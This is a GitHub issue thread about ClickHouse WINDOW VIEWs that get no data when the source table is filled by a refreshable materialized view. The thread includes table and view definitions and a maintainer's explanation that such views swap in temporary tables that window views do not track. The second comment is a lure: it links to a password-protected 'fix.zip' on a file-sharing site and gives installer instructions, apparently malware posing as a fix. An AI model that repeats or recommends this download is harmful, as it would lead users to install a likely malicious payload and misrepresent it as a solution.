### ISSUE TITLE
Window View not working 

### ISSUE THREAD

**Issue by nagababu9652** [ClickHouse/ClickHouse#68987]
### Company or project name

IOT Engine Analytics

### Question

I have a table tbltrackerlagdata where data will be inserted once every day. When i creating window views on this table i was not getting any results, but while running insert query for window view it was working fine. I have 3 use cases with this table tbltrackerlagdata , where i need to use window views at two cases. I tried checking logs but didn't get any error logs. Please help.

create table tbltrackerlagdata(deviceid String, uniqueid Int32,   ignitionstatus Int8, speed Int32, tenantgroupname String, devicetypename String, parsername String,     latitude Float32,    longitude Float32,  devicedatetime DateTime, insertdatetime DateTime, vehicleid String,  lagignition Int8, laglatitude Float32, laglongitude Float32, lagspeed Int32) Engine = MergeTree()PRIMARY KEY (insertdatetime) TTL insertdatetime + INTERVAL 2 DAY

CREATE MATERIALIZED VIEW viewtrackerlagdata REFRESH EVERY 1 DAY TO tbltrackerlagdata  as select deviceid, uniqueid,   ignitionstatus, speed, tenantgroupname, devicetypename, parsername,     latitude,    longitude,  devicedatetime, insertdatetime, vehicleid, lagInFrame (ignitionstatus) over win as  lagignition, lagInFrame(latitude) over win as laglatitude, lagInFrame (longitude) over win as laglongitude, lagInFrame(speed) over win as lagspeed from tbltrackerdata WHERE recordstatus = 1 AND devicetypename != '' AND insertdatetime >= toDateTime(toStartOfDay(now() - interval 1 day)) AND insertdatetime < toDateTime(toStartOfDay(now())) AND devicedatetime < insertdatetime + INTERVAL 1 MINUTE  window win as (partition by deviceid order by devicedatetime)

CREATE TABLE tblignitionstatetransitions ( deviceid String, tenantgroupname String, devicetypename String, parsername String, windowstart DateTime, windowend DateTime, transitions Int32) Engine = MergeTree() PRIMARY KEY (deviceid, windowstart)
CREATE WINDOW VIEW viewignitionstatetransitions to tblignitionstatetransitions select deviceid, any(E.tenantgroupname) as tenantgroupname, any(E.devicetypename) as devicetypename, any(E.parsername) as parsername, tumbleStart(windowid) AS windowstart, tumbleEnd(windowid) AS windowend, countIf(ignitionstatus , ignitionstatus != lagignition) as transitions FROM tbltrackerlagdata  E GROUP BY tumble(insertdatetime, toIntervalDay('1')) AS windowid, deviceid

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by den-crane** [comment]
It's expected behaviour. Refreshable materialized view don't do insertion. They insert into temporary invisible tables and swap tables in the end. WINDOW VIEWs don't not track the insertion into temporary invisible tables.

**Comment by nagababu9652** [comment]
@den-crane Thank you for the response,

Why i was using the refreshable materialized view instead of normal materialized view is because of the fact that materialized views can't read from the source table. So for achieving the lag i  used the refreshable materialized views. 

So is there any alternative other than create an refreshable view upon the table created after the refreshable view.

**Comment by den-crane** [comment]
> Why i was using the refreshable materialized view instead of normal materialized view is because of the fact that materialized views can't read from the source table. So for achieving the lag i used the refreshable materialized views.

OK.

> So is there any alternative other than create an refreshable view upon the table created after the refreshable view.

Sorry, why do you need the alternative? You created a refreshable materialized view and ... ? Why do you need something else?

**Comment by nagababu9652** [comment]
What i mean is, after creating the refreshable table which insert(shifts) data to a table x. i need to do queries on  table x as it updates the data and saves it in a table Y for the analytical purpose.

**Comment by den-crane** [comment]
create one more refreshable materialized view which reads `x` and saves to `y`

**Comment by nagababu9652** [comment]
But even then "Refreshable materialized views don't do insertion". So what was the point. As i mentioned, I need to work on window view on refreshable view data. Any Idea.
